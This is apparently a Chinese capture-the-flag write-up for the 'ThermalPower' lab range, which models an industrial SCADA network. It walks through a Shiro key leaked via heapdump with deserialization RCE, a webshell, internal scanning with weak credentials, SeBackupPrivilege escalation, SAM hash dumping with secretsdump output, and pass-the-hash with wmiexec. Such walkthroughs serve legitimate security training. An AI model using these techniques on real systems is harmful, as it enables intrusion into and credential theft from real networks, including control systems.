春秋云镜-ThermalPower

flag01

外网heapdump泄露shirokey,然后打shiro反序列化rce。

/actuator/heapdump 
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump


CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES

然后注入冰蝎🐎,然后读到flag01

flag02

上传fscan,扫描内网,搭建代理隧道

root@security:~# cat 1.txt
start infoscan
(icmp) Target 172.22.17.6     is alive
(icmp) Target 172.22.17.213   is alive
[*] Icmp alive hosts len is: 2
172.22.17.6:139 open
172.22.17.6:80 open
172.22.17.6:135 open
172.22.17.6:21 open
172.22.17.213:22 open
172.22.17.213:8080 open
172.22.17.6:445 open
[*] alive ports len is: 7
start vulscan
[*] NetInfo 
[*]172.22.17.6
   [->]WIN-ENGINEER
   [->]172.22.17.6
[*] WebTitle http://172.22.17.213:8080 code:302 len:0      title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=D43EAC4004A8B86867F8197CB922495A
[*] NetBios 172.22.17.6     WORKGROUP\WIN-ENGINEER        
[*] WebTitle http://172.22.17.213:8080/login;jsessionid=D43EAC4004A8B86867F8197CB922495A code:200 len:2936   title:火创能源监控画面管理平台
[+] ftp 172.22.17.6:21:anonymous 
   [->]Modbus
   [->]PLC
   [->]web.config
   [->]WinCC
   [->]内部软件
   [->]火创能源内部资料
[*] WebTitle http://172.22.17.6        code:200 len:661    title:172.22.17.6 - /
[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file 
[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2
已完成 6/7 [-] ssh 172.22.17.213:22 root root#123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 
已完成 6/7 [-] ssh 172.22.17.213:22 root 000000 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 
root@security:~# cat 2.txt
start infoscan
(icmp) Target 172.22.26.11    is alive
[*] Icmp alive hosts len is: 1
172.22.26.11:1433 open
172.22.26.11:445 open
172.22.26.11:139 open
172.22.26.11:135 open
172.22.26.11:80 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo 
[*]172.22.26.11
   [->]WIN-SCADA
   [->]172.22.26.11
[*] NetBios 172.22.26.11    WORKGROUP\WIN-SCADA           
[+] mssql 172.22.26.11:1433:sa 123456
[*] WebTitle http://172.22.26.11       code:200 len:703    title:IIS Windows Server

扫出来ftp,连接一下

rdp连172.22.26.11,然后点一下那个锅炉开就有flag了

flag03

按住windows+d回主页,可以看到桌面上有个ScadaDB.sql.locky,我们直接连数据库里那个flag是空的,得找备份,但这个备份被加密了,这里我们用题目描述里给的密钥解密一下即可

题目描述里给了一个privateKey和encryptedAesKey,使用privateKey用rsa加密了aeskey得到的encryptedAesKey

#privateKey
<RSAKeyValue><Modulus>uoL2CAaVtMVp7b4/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG/4ULSDURfAihyN1HILP/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=</Modulus><Exponent>AQAB</Exponent><P>2RPqaofcJ/phIp3QFCEyi0kj0FZRQmmWmiAmg/C0MyeX255mej8Isg0vws9PNP3RLLj25O1pbIJ+fqwWfUEmFw==</P><Q>2/QGgIpqpxODaJLQvjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbkVfy5Fw==</Q><DP>ulK51o6ejUH/tfK281A7TgqNTvmH7fUra0dFR+KHCZFmav9e/na0Q//FivTeC6IAtN5eLMkKwDSR1rBm7UPKKQ==</DP><DQ>PO2J541wIbvsCMmyfR3KtQbAmVKmPHRUkG2VRXLBV0zMwke8hCAE5dQkcct3GW8jDsJGS4r0JsOvIRq5gYAyHQ==</DQ><InverseQ>JS2ttB0WJm223plhJQrWqSvs9LdEeTd8cgNWoyTkMOkYIieRTRko/RuXufgxppl4bL9RRTI8e8tkHoPzNLK4bA==</InverseQ><D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQNUM6ss/2/CMM/EgM9vz0=</D></RSAKeyValue>

先把XML转成PEM格式(https://www.ssleye.com/ssltool/pem_xml.html)

-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+
PyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3
YiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz/1qgqr
rtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17
8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox
RqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQN
UM6ss/2/CMM/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz
J5fbnmZ6PwiyDS/Cz080/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2/QGgIpqpxODaJLQ
vjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbk
Vfy5FwJBALpSudaOno1B/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr/Xv52tEP/
xYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0
VJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd
FiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy/UUUy
PHvLZB6D8zSyuGw=
-----END PRIVATE KEY-----

然后找个在线网站把encryptedAesKey解一下(https://www.lddgo.net/encrypt/rsa)

最后写个aes脚本解一下找个sql文件,把前16位作为iv

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64

# 读取加密文件内容
encrypted_file = 'ScadaDB.sql.locky'
with open(encrypted_file, 'rb') as file:
    encrypted_data = file.read()

# 解密密钥
key = 'cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk='
key = base64.b64decode(key)

# 按照每 16 位数据作为 IV 进行解密
iv = encrypted_data[:16]

# 创建 AES 解密器
cipher = AES.new(key, AES.MODE_CBC, IV=iv)

# 解密数据(去除 IV 后的部分)
decrypted_data = unpad(cipher.decrypt(encrypted_data[16:]), AES.block_size)

# 写入解密后的内容到新文件
decrypted_file = 'decrypted_file.txt'
with open(decrypted_file, 'wb') as file:
    file.write(decrypted_data)

print(f'文件解密完成,解密后的数据已保存到 {decrypted_file}')

flag04

还有一个flag在SCADA工程师的个人PC上,要提权。还是那个ftp,可以翻到很多用户资料以及他们的密码规范初始密码为账户名+@+工号,比如工程师chenhua,我们可以拼出来密码为chenhua@0813,这个可以直接rdp上172.22.17.6,因为用户在Backup Operators组内,所以可以使用Backup Operators组内权限提权(https://github.com/k4sth4/SeBackupPrivilege)

SeBackupPrivilege 提权

PS C:\Windows\system32> whoami /priv

特权信息
----------------------

特权名                        描述           状态
============================= ============== ======
SeBackupPrivilege             备份文件和目录 已禁用
SeRestorePrivilege            还原文件和目录 已禁用
SeShutdownPrivilege           关闭系统       已禁用
SeChangeNotifyPrivilege       绕过遍历检查   已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用
PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeUtils.dll

PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll

PS C:\Users\chenhua\Desktop> Set-SeBackupPrivilege

PS C:\Users\chenhua\Desktop> Get-SeBackupPrivilege
SeBackupPrivilege is enabled

PS C:\Users\chenhua\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\flag\flag02.txt C:\Users\chenhua\Desktop\flag02.txt -Overwrite
Copied 350 bytes

PS C:\Users\chenhua\Desktop>  type .\flag02.txt
  _____.__                 _______   ________  
_/ ____\  | _____     ____ \   _  \  \_____  \ 
\   __\|  | \__  \   / ___\/  /_\  \  /  ____/ 
 |  |  |  |__/ __ \_/ /_/  >  \_/   \/       \ 
 |__|  |____(____  /\___  / \_____  /\_______ \
                 \//_____/        \/         \/


flag02: flag{da8d8d44-8b2a-4650-b3d8-39fb18fde83a}

注册表 SAM 转储

还有一种提权方式就是用SeBackupPrivilege把sam文件给copy下来然后到本地进行分析导出Hash值,因为在windows中sam文件就是验证所用的

PS C:\Users\chenhua\Desktop> cd C:\
PS C:\Users\chenhua\Desktop> mkdir Temp
PS C:\Users\chenhua\Desktop> cd C:\Temp
PS C:\Temp> reg save hklm\sam c:\Temp\sam
PS C:\Temp> reg save hklm\system c:\Temp\system
python secretsdump.py -sam sam -system system LOCAL
-----
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x6c2be46aaccdf65a9b7be2941d6e7759
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a2fa2853651307ab9936cc95c0e0acf5:::
chentao:1000:aad3b435b51404eeaad3b435b51404ee:47466010c82da0b75328192959da3658:::
zhaoli:1001:aad3b435b51404eeaad3b435b51404ee:2b83822caab67ef07b614d05fd72e215:::
wangning:1002:aad3b435b51404eeaad3b435b51404ee:3c52d89c176321511ec686d6c05770e3:::
zhangling:1003:aad3b435b51404eeaad3b435b51404ee:8349a4c5dd1bdcbc5a14333dd13d9f81:::
zhangying:1004:aad3b435b51404eeaad3b435b51404ee:8497fa5480a163cb7817f23a8525be7d:::
lilong:1005:aad3b435b51404eeaad3b435b51404ee:c3612c48cf829d1149f7a4e3ef4acb8a:::
liyumei:1006:aad3b435b51404eeaad3b435b51404ee:63ddcde0fa219c75e48e2cba6ea8c471:::
wangzhiqiang:1007:aad3b435b51404eeaad3b435b51404ee:5a661f54da156dc93a5b546ea143ea07:::
zhouyong:1008:aad3b435b51404eeaad3b435b51404ee:5d49bf647380720b9f6a15dbc3ffe432:::
[*] Cleaning up...
python wmiexec.py administrator@172.22.17.6 -hashes :f82292b7ac79b05d5b0e3d302bd0d279 -codec gbk
-----
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd C:\Users\Administrator\flag
C:\Users\Administrator\flag>dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 C02E-FBD8

 C:\Users\Administrator\flag 的目录

2023/12/25  23:49    <DIR>          .
2024/03/05  10:19    <DIR>          ..
2024/03/05  10:11               350 flag02.txt
               1 个文件            350 字节
               2 个目录 23,025,643,520 可用字节

C:\Users\Administrator\flag>type flag02.txt
  _____.__                 _______   ________
_/ ____\  | _____     ____ \   _  \  \_____  \
\   __\|  | \__  \   / ___\/  /_\  \  /  ____/
 |  |  |  |__/ __ \_/ /_/  >  \_/   \/       \
 |__|  |____(____  /\___  / \_____  /\_______ \
                 \//_____/        \/         \/

flag02: flag{da8d8d44-8b2a-4650-b3d8-39fb18fde83a}

参考:

https://fushuling.com/index.php/2024/03/01/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-thermalpower/

https://xz.aliyun.com/t/14088?u_atoken=4f31f8976a72f0ded72328a049c1d25e&u_asession=01DXgFEAMacdnbkEzgZJL0migLCbA1pdB1DFpZc3krAQRafwn8Kz_1t_r5nSBSFXtPJB-YY_UqRErInTL5mMzm-GyPlBJUEqctiaTooWaXr7I&u_asig=05-7OecI6yy-_9aBg5FaxKg25yxnOUH8Ud-wk0aaswA09THqcKuEgUGsLoLBIx_malvvdOKS-qK1l-58ElLjpN1g8hYa7B3bzL79h5huLkqWT8ZluEJLSc0BSzZU3evySz5B7X4EXeIUIdiu8TCHyiFJAfVL8ZX1BbfTI_9uyQrFfBzhvSc0Kr8URjOX9Xe4tk38iw746e5LYTtUanQFdLqYTJln4DK1dFmwM2VuNXSK5WAD64vm-G4R2Q6Bgf7DPpOypUXqQWvaszEA1SJ50IQbV8WYV_UXdG06YN7YaeUvN6gx6UxFgdF3ARCQ86jS_u_XR5hatHQVh06VuUZ-D1wA&u_aref=wlPJ002ny2D831Ug5LpUgLpR1ng%3D#toc-13